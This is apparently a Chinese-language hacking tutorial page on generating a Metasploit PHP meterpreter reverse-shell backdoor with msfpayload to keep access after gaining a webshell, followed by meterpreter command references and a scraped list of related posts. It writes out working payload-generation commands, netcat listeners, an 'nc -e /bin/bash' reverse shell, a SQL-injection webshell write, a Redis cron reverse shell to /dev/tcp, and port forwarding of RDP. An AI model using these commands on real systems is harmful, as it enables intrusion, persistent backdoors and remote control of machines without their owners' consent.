msfpayload反弹shell

1、前期--

情景就是当我们获得webshell时,我们想留下我们的后门,这个时候我们可以用到msfpayload与msfconsole结合使用

启动PostgreSQL服务:service postgresql start

启动metasploit服务:service metasploit start

启动msfconsole:msfconsole

查看数据库连接状态:db_status

生成后门文件

msfpayload php/meterpreter/reverse_tcp LHOST=192.168.133.128 LPORT=5555 R | msfencode -e php/base64 -t raw -o /root/Desktop/exp.php

exp.php需要加上<?php  ?>

攻击端启动监听

或者

nc 192.168.133.128 -lvp 5555

然后去访问我们的后门文件

2、大家想保存我们得到的session怎么办?首先必须连接数据库

exploit -h
 -e <opt>  The payload encoder to use.  If none is specified, ENCODER is used.  有效负载编码,默认使用
    -f        Force the exploit to run regardless of the value of MinimumRank.
    -h        Help banner.
    -j        Run in the context of a job.  在后台中运行
    -n <opt>  The NOP generator to use.  If none is specified, NOP is used.
    -o <opt>  A comma separated list of options in VAR=VAL format.
    -p <opt>  The payload to use.  If none is specified, PAYLOAD is used.
    -t <opt>  The target index to use.  If none is specified, TARGET is used.
    -z        Do not interact with the session after successful exploitation  建立会话放到后台
sessions -h
    -K        Terminate all sessions  杀死所有sessions
    -c <opt>  Run a command on the session given with -i, or all 执行一个命令
    -d <opt>  Detach an interactive session
    -h        Help banner
    -i <opt>  Interact with the supplied session ID   连接会话
    -k <opt>  Terminate sessions by session ID and/or range
    -l        List all active sessions
    -q        Quiet mode
    -r        Reset the ring buffer for the session given with -i, or all
    -s <opt>  Run a script on the session given with -i, or all
    -t <opt>  Set a response timeout (default: 15)
    -u <opt>  Upgrade a shell to a meterpreter session on many platforms
    -v        List verbose fields

3、meterpreter使用

Core Commands 代码命令
=============

    Command                   Description
    -------                   -----------
    ?                         Help menu  查看帮助
    background                Backgrounds the current session 将sessions保存到后台
    bgkill                    Kills a background meterpreter script  杀死后台meterpreter脚本
    bglist                    Lists running background scripts 列出后台meterpreter脚本
    bgrun                     Executes a meterpreter script as a background thread   在后台进程中执行一个脚本
    channel                   Displays information about active channels  显示活动的通道
    close                     Closes a channel  关闭通道
    disable_unicode_encoding  Disables encoding of unicode strings
    enable_unicode_encoding   Enables encoding of unicode strings
    exit                      Terminate the meterpreter session  退出
    help                      Help menu
    info                      Displays information about a Post module
    interact                  Interacts with a channel
    irb                       Drop into irb scripting mode  开启ruby终端
    load                      Load one or more meterpreter extensions
    quit                      Terminate the meterpreter session
    read                      Reads data from a channel
    resource                  Run the commands stored in a file
    run                       Executes a meterpreter script or Post module
    use                       Deprecated alias for ‘load‘
    write                     Writes data to a channel

Stdapi: File system Commands  文件命令
============================

    Command       Description
    -------       -----------
    cat           Read the contents of a file to the screen
    cd            Change directory
    download      Download a file or directory
    edit          Edit a file
    getlwd        Print local working directory
    getwd         Print working directory
    lcd           Change local working directory
    lpwd          Print local working directory
    ls            List files
    mkdir         Make directory
    pwd           Print working directory
    rm            Delete the specified file
    rmdir         Remove directory
    search        Search for files
    upload        Upload a file or directory

Stdapi: Networking Commands 网络命令
===========================

    Command       Description
    -------       -----------
    portfwd       Forward a local port to a remote service  端口转发   portfwd  add -l 5555 -p 3389 -r 192.168.198.129  将192.168.198.129的3389端口转发到本地的5555端口

Stdapi: System Commands
=======================

    Command       Description
    -------       -----------
    execute       Execute a command  执行命令
    getenv        Get one or more environment variable values
    getpid        Get the current process identifier
    getuid        Get the user that the server is running as
    kill          Terminate a process
    ps            List running processes
    shell         Drop into a system command shell  生成一个shell
    sysinfo       Gets information about the remote system, such as OS  查看系统信息

附上:初探meterpreter

时间: 2024-10-06 00:35:21

msfpayload反弹shell的相关文章

JS探测内网是否存在bash漏洞,反弹shell

来t00ls几天啦,也没时间写原创. --(本人首发土司啦.) 最近看到老外一篇文章,觉得很不错. 测试了一下把这个东西把过程分享给大伙,希望大伙不要踩,忙完这几天就写原创 调用一个js,扫描内网是否存在bash漏洞,然后反弹shell回来的一个小东西.搞APT应该用得到啦. 测试过程: 老外发的一个Poc我内网搭建测试 先监听了本地250端口 然后搭建之后访问 1 http://192.168.1.9/test.html?s=192.168.1.1&e3=1&e4=20&d=19

NC / Netcat - 反弹Shell

原理 实验环境: 攻击机:windows机器,IP:192.168.12.109 受害机:linux机器,IP:192.168.79.1 攻击机:设置本地监听端口2222 C:\netcat>nc -l -p 2222 受害机:反弹/bin/bash 到攻击机(192.168.12.109)的2222端口 [email protected]:~# nc 192.168.12.109 2222 -e /bin/bash 反弹shell成功后即可在windows的cmd.exe下执行Linux下的/

Python3实现——反弹shell

一.演示一下反弹shell的效果 0.看一下python版本 1.我们这边是服务端 客户端连接后就可以输入命令了,比如下面截图中输入的pwd 2.目标机是客户端,输入ip和端口 二.代码+注释 0.服务端 1.客户端

小白日记40:kali渗透测试之Web渗透-SQL手工注入(二)-读取文件、写入文件、反弹shell

SQL手工注入 1.读取文件[load_file函数] ' union  SELECT null,load_file('/etc/passwd')--+ burpsuite 2.写入文件 ' union select null,"<?php passthru($_GET['cmd']); ?>" INTO DUMPFILE "/var/www/a.php" --+   [写入一句话木马:INTO DUMPLING:MySQL函数,将输入下载在数据库中]

Python 反弹shell后门用51CTO Blog绑定

前言:仅做交流,仅做交流. 除了51CTO当然也可以用其他的媒介啦,比如微博,微信等.这里就用51CTO吧 思路:存在这样的一个情况,我们在某台机器上放置一个木马~~~里面我们会写入自己服务端的IP,但是可能我们的IP会变,我们当然可以用域名解决这个问题,不过那样显得不是很优雅,而且域名要钱的啦~~~所以我们需要一个中间件! 在说说什么是反弹Shell,反弹shell的好处在于被攻击的主机可能限制了进口,即只允许某个端口的链接,其他链接都屏蔽,这个时候我们就需要被攻击的主机主动来连我们的服务器,

Redis未授权访问反弹shell

目标主机:10.104.11.178 攻击机:kali 攻击步骤: 1.与目标主机连接 [email protected]:~# /usr/redis/redis-cli -h 10.104.11.178 2.kali主机进行监听 nc -l -v -p 9999 3.写入反弹shell语句 set xxx "\n\n*/1 * * * * /bin/bash -i>&/dev/tcp/10.104.11.153/9999 0>&1\n\n" config

Zabbix sql注入漏洞脚本执行反弹shell

exp检测是否存在SQL注入漏洞[email protected]:~# python zabbix.py http://ip:9090/+------------------------------------------------------------+ Python Zabbix<3.0.4 SQL注入 Exploitsuccess+------------------------------------------------------------+Zabbix 存在SQL注入漏洞

redis未授权反弹shell

rt发现一处redis未授权,进行反弹shell.输入反弹命令:主机监听端口:反弹成功. 原文地址:https://blog.51cto.com/13539934/2395206

分享一个免杀的反弹shell工具(python脚本转换成exe)

有时候网站服务器上有杀毒软件,我们上传的nc.exe.lcx.exe等工具都被杀了,这时候就需要一款免杀的工具来反弹shell. 这篇博客主要是依据国外的一片文章翻译而来,根据国外大佬的教程将Python脚本转换成exe程序即可免杀. 参考链接:https://medium.com/bugbountywriteup/antivirus-evasion-with-python-49185295caf1 第1步:安装Python2.7和Py2exe 一定要安装32位的Python 2.7和32位的P